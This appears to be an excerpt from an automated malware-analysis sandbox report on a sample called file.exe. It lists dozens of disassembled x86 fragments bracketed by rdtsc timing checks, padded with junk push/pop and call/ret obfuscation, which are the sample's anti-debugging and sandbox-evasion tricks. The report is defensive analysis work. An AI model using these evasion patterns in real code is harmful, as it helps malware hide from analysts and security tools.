                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C276 second address: 45C31B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jnc 00007FA49D1B33D0h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FA49D1B33C8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov esi, dword ptr [ebp+122D2965h] 0x00000032 call 00007FA49D1B33C9h 0x00000037 jp 00007FA49D1B33D8h 0x0000003d push eax 0x0000003e jnc 00007FA49D1B33D4h 0x00000044 mov eax, dword ptr [esp+04h] 0x00000048 jng 00007FA49D1B33D6h 0x0000004e jmp 00007FA49D1B33D0h 0x00000053 mov eax, dword ptr [eax] 0x00000055 push eax 0x00000056 push edx 0x00000057 jc 00007FA49D1B33CCh 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C31B second address: 45C31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C31F second address: 45C336 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FA49D1B33C6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C336 second address: 45C37C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp+122D2F90h], ecx 0x0000000e push 00000003h 0x00000010 push 00000000h 0x00000012 xor dl, 00000071h 0x00000015 call 00007FA49CDAB57Fh 0x0000001a mov edi, dword ptr [ebp+122D2A3Dh] 0x00000020 pop edi 0x00000021 push 00000003h 0x00000023 mov ecx, dword ptr [ebp+122D2A59h] 0x00000029 push 827B3598h 0x0000002e push eax 0x0000002f push edx 0x00000030 jo 00007FA49CDAB57Ch 0x00000036 jl 00007FA49CDAB576h 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C37C second address: 45C3C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007FA49D1B33C6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 3D84CA68h 0x00000013 call 00007FA49D1B33CAh 0x00000018 movsx edi, di 0x0000001b pop ecx 0x0000001c lea ebx, dword ptr [ebp+1244E009h] 0x00000022 or dword ptr [ebp+122D18CFh], esi 0x00000028 xchg eax, ebx 0x00000029 jmp 00007FA49D1B33CCh 0x0000002e push eax 0x0000002f pushad 0x00000030 jne 00007FA49D1B33C8h 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44DEF9 second address: 44DF09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB57Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47AF26 second address: 47AF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47AF2A second address: 47AF46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB588h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47AF46 second address: 47AF54 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007FA49D1B33C6h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47AF54 second address: 47AF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B3A2 second address: 47B3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA49D1B33C6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B3AD second address: 47B3C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA49CDAB57Eh 0x00000009 jnc 00007FA49CDAB576h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47BE5D second address: 47BE8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA49D1B33C6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007FA49D1B33D9h 0x00000011 popad 0x00000012 js 00007FA49D1B33CEh 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47BE8D second address: 47BE94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47BE94 second address: 47BEAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 push esi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA49D1B33CBh 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C02E second address: 47C034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C2FF second address: 47C326 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007FA49D1B33CEh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C326 second address: 47C33D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FA49CDAB580h 0x00000008 pop esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C33D second address: 47C36A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FA49D1B33D9h 0x00000011 js 00007FA49D1B33C6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C36A second address: 47C379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FA49CDAB576h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C379 second address: 47C37D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C37D second address: 47C381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C381 second address: 47C387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C387 second address: 47C396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA49CDAB57Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47E9CE second address: 47EA0F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA49D1B33C6h 0x00000008 jmp 00007FA49D1B33D5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FA49D1B33D8h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jng 00007FA49D1B33C6h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EA0F second address: 47EA26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA49CDAB57Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EA26 second address: 47EA4C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA49D1B33C6h 0x00000008 jmp 00007FA49D1B33D1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FA49D1B33D2h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EA4C second address: 47EA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA49CDAB576h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483E25 second address: 483E29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483E29 second address: 483E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48427C second address: 484290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484677 second address: 48467D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48467D second address: 484682 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4886C5 second address: 4886C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4886C9 second address: 4886D9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA49D1B33C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4886D9 second address: 4886DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 487AFB second address: 487B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA49D1B33CBh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 487E20 second address: 487E3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB587h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 487E3F second address: 487E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 487E45 second address: 487E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488513 second address: 488529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FA49D1B33CEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488529 second address: 48852D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48852D second address: 48854C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA49D1B33C6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA49D1B33D1h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48ACB6 second address: 48ACBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48ACBC second address: 48ACDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48ACDA second address: 48ACE0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48ACE0 second address: 48ACEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA49D1B33CAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B386 second address: 48B38A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B38A second address: 48B3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FA49D1B33C8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA49D1B33CCh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B422 second address: 48B42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA49CDAB576h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B807 second address: 48B80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B80D second address: 48B818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FA49CDAB576h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B818 second address: 48B874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FA49D1B33D5h 0x0000000d xchg eax, ebx 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FA49D1B33C8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 ja 00007FA49D1B33CCh 0x0000002e jmp 00007FA49D1B33CEh 0x00000033 nop 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B874 second address: 48B878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B878 second address: 48B884 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B954 second address: 48B969 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA49CDAB581h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48BD40 second address: 48BD46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48BDDA second address: 48BE2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB587h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007FA49CDAB57Eh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FA49CDAB578h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b xchg eax, ebx 0x0000002c je 00007FA49CDAB58Fh 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48BE2F second address: 48BE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48C38D second address: 48C391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48C391 second address: 48C39F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FA49D1B33C6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48CD3C second address: 48CD40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48CD40 second address: 48CD4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48CD4C second address: 48CD5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB57Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48E9BF second address: 48EA31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FA49D1B33C8h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov di, si 0x00000026 mov si, cx 0x00000029 push 00000000h 0x0000002b sub dword ptr [ebp+122D1D4Bh], esi 0x00000031 push 00000000h 0x00000033 xor dword ptr [ebp+12476F62h], ecx 0x00000039 xchg eax, ebx 0x0000003a jmp 00007FA49D1B33D4h 0x0000003f push eax 0x00000040 jp 00007FA49D1B33E2h 0x00000046 pushad 0x00000047 jmp 00007FA49D1B33D4h 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 491514 second address: 491528 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB580h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 491528 second address: 491597 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FA49D1B33C8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov edi, 1293CD05h 0x0000002b push 00000000h 0x0000002d mov edi, dword ptr [ebp+122D1AD4h] 0x00000033 xchg eax, ebx 0x00000034 jnl 00007FA49D1B33DBh 0x0000003a push eax 0x0000003b push ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FA49D1B33CFh 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 493273 second address: 493279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 493279 second address: 49327D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49327D second address: 493286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 493286 second address: 49328B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48F1BB second address: 48F1BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48F1BF second address: 48F1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48F1C5 second address: 48F1D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA49CDAB57Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 491D0F second address: 491D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FA49D1B33CEh 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498731 second address: 498736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490795 second address: 49079D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498736 second address: 498757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB582h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007FA49CDAB580h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49079D second address: 4907A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498757 second address: 4987B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007FA49CDAB578h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007FA49CDAB578h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d mov ebx, 3DEE427Ah 0x00000042 push 00000000h 0x00000044 clc 0x00000045 push eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 jno 00007FA49CDAB576h 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49676E second address: 496807 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007FA49D1B33C6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FA49D1B33C8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov edi, 734E6026h 0x0000002c and di, 1007h 0x00000031 push dword ptr fs:[00000000h] 0x00000038 sub dword ptr [ebp+122D315Fh], esi 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 jmp 00007FA49D1B33CAh 0x0000004a mov eax, dword ptr [ebp+122D0B8Dh] 0x00000050 or edi, 76A772A1h 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push ecx 0x0000005b call 00007FA49D1B33C8h 0x00000060 pop ecx 0x00000061 mov dword ptr [esp+04h], ecx 0x00000065 add dword ptr [esp+04h], 0000001Ch 0x0000006d inc ecx 0x0000006e push ecx 0x0000006f ret 0x00000070 pop ecx 0x00000071 ret 0x00000072 or dword ptr [ebp+122D304Bh], eax 0x00000078 nop 0x00000079 push edi 0x0000007a pushad 0x0000007b pushad 0x0000007c popad 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4978F2 second address: 4978F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
